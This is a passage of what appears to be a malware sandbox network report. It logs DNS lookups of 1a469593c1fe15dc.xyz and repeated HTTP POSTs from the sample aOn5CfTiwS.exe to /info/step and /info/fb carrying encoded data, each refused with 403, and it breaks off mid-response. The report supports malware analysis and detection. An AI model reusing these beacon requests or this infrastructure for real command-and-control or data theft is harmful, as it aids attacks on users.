Jan 30, 2021 18:07:21.965588093 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965641975 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965692043 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965694904 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965748072 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965796947 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965801001 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965852976 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965903044 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:21.965914965 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.965970039 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:21.966018915 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.158562899 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158659935 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158725023 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158772945 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158813000 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.158824921 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158840895 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.158888102 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158932924 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.158951044 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.158988953 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159030914 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159046888 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159087896 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159127951 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159146070 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159183979 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159225941 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159239054 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159288883 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159329891 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159348011 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159385920 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159425974 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159444094 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159482002 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159539938 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159543037 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159593105 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.159648895 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.159761906 CET	49728	80	192.168.2.3	198.54.117.244
Jan 30, 2021 18:07:22.352682114 CET	80	49728	198.54.117.244	192.168.2.3
Jan 30, 2021 18:07:22.352874994 CET	49728	80	192.168.2.3	198.54.117.244

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2021 18:06:57.798837900 CET	58361	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:06:57.849272966 CET	53	58361	8.8.8.8	192.168.2.3
Jan 30, 2021 18:06:58.594795942 CET	63492	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:06:58.645800114 CET	53	63492	8.8.8.8	192.168.2.3
Jan 30, 2021 18:06:59.492619991 CET	60831	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:06:59.542228937 CET	53	60831	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:00.733872890 CET	60100	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:00.784677029 CET	53	60100	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:01.688034058 CET	53195	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:01.736174107 CET	53	53195	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:03.484817028 CET	50141	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:03.537050962 CET	53	50141	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:04.422413111 CET	53023	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:04.470484018 CET	53	53023	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:05.356825113 CET	49563	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:05.404755116 CET	53	49563	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:05.990397930 CET	51352	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:06.197981119 CET	53	51352	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:06.218885899 CET	59349	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:06.269610882 CET	53	59349	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:07.180414915 CET	57084	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:07.236548901 CET	53	57084	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:07.411179066 CET	58823	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:07.471576929 CET	53	58823	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:07.974386930 CET	57568	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:08.141705990 CET	50540	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:08.181598902 CET	53	57568	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:08.192459106 CET	53	50540	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:13.549628973 CET	54366	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:13.608412027 CET	53	54366	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:14.104800940 CET	53034	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:14.163925886 CET	53	53034	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:14.691560030 CET	57762	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:14.749855042 CET	53	57762	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:20.922744036 CET	55435	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:20.978969097 CET	53	55435	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:30.925522089 CET	50713	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:31.014501095 CET	53	50713	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:31.184478998 CET	56132	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:31.232460976 CET	53	56132	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:38.393892050 CET	58987	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:38.454243898 CET	53	58987	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:46.740554094 CET	56579	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:46.788635015 CET	53	56579	8.8.8.8	192.168.2.3
Jan 30, 2021 18:07:48.558598995 CET	60633	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:07:48.628153086 CET	53	60633	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:05.804579020 CET	61292	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:05.852957010 CET	53	61292	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:08.752002954 CET	63619	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:08.812397003 CET	53	63619	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:40.273401976 CET	64938	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:40.321517944 CET	53	64938	8.8.8.8	192.168.2.3
Jan 30, 2021 18:08:41.884599924 CET	61946	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:08:41.958970070 CET	53	61946	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:48.985775948 CET	64910	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:49.060224056 CET	53	64910	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:49.699404955 CET	52123	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:49.759006977 CET	53	52123	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:50.636343956 CET	56130	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:50.695831060 CET	53	56130	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:51.148247957 CET	56338	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:51.228003979 CET	53	56338	8.8.8.8	192.168.2.3
Jan 30, 2021 18:09:51.806870937 CET	59420	53	192.168.2.3	8.8.8.8
Jan 30, 2021 18:09:51.863326073 CET	53	59420	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 30, 2021 18:07:05.990397930 CET	192.168.2.3	8.8.8.8	0x47c4	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:07.411179066 CET	192.168.2.3	8.8.8.8	0x92af	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:07.974386930 CET	192.168.2.3	8.8.8.8	0x1ada	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:13.549628973 CET	192.168.2.3	8.8.8.8	0x4275	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.104800940 CET	192.168.2.3	8.8.8.8	0xed4c	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.691560030 CET	192.168.2.3	8.8.8.8	0xd1bb	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:20.922744036 CET	192.168.2.3	8.8.8.8	0xeb1e	Standard query (0)	1a469593c1fe15dc.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 30, 2021 18:07:06.197981119 CET	8.8.8.8	192.168.2.3	0x47c4	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:07.471576929 CET	8.8.8.8	192.168.2.3	0x92af	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:08.181598902 CET	8.8.8.8	192.168.2.3	0x1ada	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:13.608412027 CET	8.8.8.8	192.168.2.3	0x4275	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.163925886 CET	8.8.8.8	192.168.2.3	0xed4c	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:14.749855042 CET	8.8.8.8	192.168.2.3	0xd1bb	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)
Jan 30, 2021 18:07:20.978969097 CET	8.8.8.8	192.168.2.3	0xeb1e	No error (0)	1a469593c1fe15dc.xyz	198.54.117.244	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

1a469593c1fe15dc.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49719	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:06.406303883 CET	116	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 93 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 5a 64 4d 30 58 42 72 45 4c 4b 67 75 74 77 72 64 4a 74 62 31 69 71 5a 6e 39 6a 6a 58 68 58 56 55 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFZdM0XBrELKgutwrdJtb1iqZn9jjXhXVUA~~
Jan 30, 2021 18:07:06.601322889 CET	121	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49722	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:07.685383081 CET	135	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 93 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 59 70 49 43 4a 4f 32 61 4e 77 42 69 55 44 42 49 69 5f 77 7a 37 6d 63 6b 54 35 58 45 37 55 39 42 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFYpICJO2aNwBiUDBIi_wz7mckT5XE7U9BA~~
Jan 30, 2021 18:07:07.880098104 CET	139	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49724	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:08.394299984 CET	145	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 81 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 54 50 7a 64 36 6f 6d 4e 61 61 45 63 53 7a 4f 32 5a 77 4a 4e 70 6f 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFTPzd6omNaaEcSzO2ZwJNpo~
Jan 30, 2021 18:07:08.591455936 CET	151	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49725	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:13.813857079 CET	160	OUT	POST /info/fb HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 337 Data Raw: 69 6e 66 6f 3d 69 38 39 36 50 2d 69 71 67 65 32 52 43 71 31 4d 63 57 4e 79 58 6e 64 37 52 69 4a 43 6d 54 53 56 78 50 68 63 61 53 66 6d 41 53 35 49 73 4b 46 36 37 7a 4b 6e 71 6a 58 46 6d 75 4c 57 49 2d 6a 57 4f 32 33 6e 44 37 2d 56 32 59 50 46 78 7a 5f 68 7a 4f 76 64 58 56 64 50 58 75 59 49 55 38 7a 65 51 6d 6d 43 46 4c 49 4e 39 4c 73 4f 47 6e 58 66 6a 46 37 62 69 6d 54 36 73 39 35 41 43 39 42 2d 76 61 64 52 4d 71 69 55 33 31 43 2d 47 4a 6d 6b 66 39 6f 51 59 65 35 72 55 44 61 67 4c 67 50 43 6c 71 2d 76 74 73 62 6d 6d 69 34 70 54 49 43 61 51 6e 31 34 41 35 41 65 58 71 30 6c 6a 76 63 69 63 69 47 56 43 5a 43 5f 76 4c 6d 6a 68 70 7a 53 52 5f 4a 31 56 62 6c 75 43 6a 51 7a 4a 51 51 45 74 37 33 62 31 44 37 46 65 61 6d 30 47 37 76 41 42 67 46 6b 6f 7a 47 37 31 56 53 77 32 31 31 47 47 35 30 68 42 51 78 72 5a 4e 68 4d 63 4a 59 4b 4f 48 72 50 37 2d 38 59 35 31 78 67 6c 48 56 50 30 6b 53 63 31 75 46 32 36 35 46 66 42 76 6b 75 75 34 7a 5f 75 6d 4d 6a 72 49 78 7a 74 4e 38 62 36 78 44 55 77 74 41 39 59 67 45 7e Data Ascii: info=i896P-iqge2RCq1McWNyXnd7RiJCmTSVxPhcaSfmAS5IsKF67zKnqjXFmuLWI-jWO23nD7-V2YPFxz_hzOvdXVdPXuYIU8zeQmmCFLIN9LsOGnXfjF7bimT6s95AC9B-vadRMqiU31C-GJmkf9oQYe5rUDagLgPClq-vtsbmmi4pTICaQn14A5AeXq0ljvciciGVCZC_vLmjhpzSR_J1VbluCjQzJQQEt73b1D7Feam0G7vABgFkozG71VSw211GG50hBQxrZNhMcJYKOHrP7-8Y51xglHVP0kSc1uF265FfBvkuu4z_umMjrIxztN8b6xDUwtA9YgE~
Jan 30, 2021 18:07:14.008676052 CET	160	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 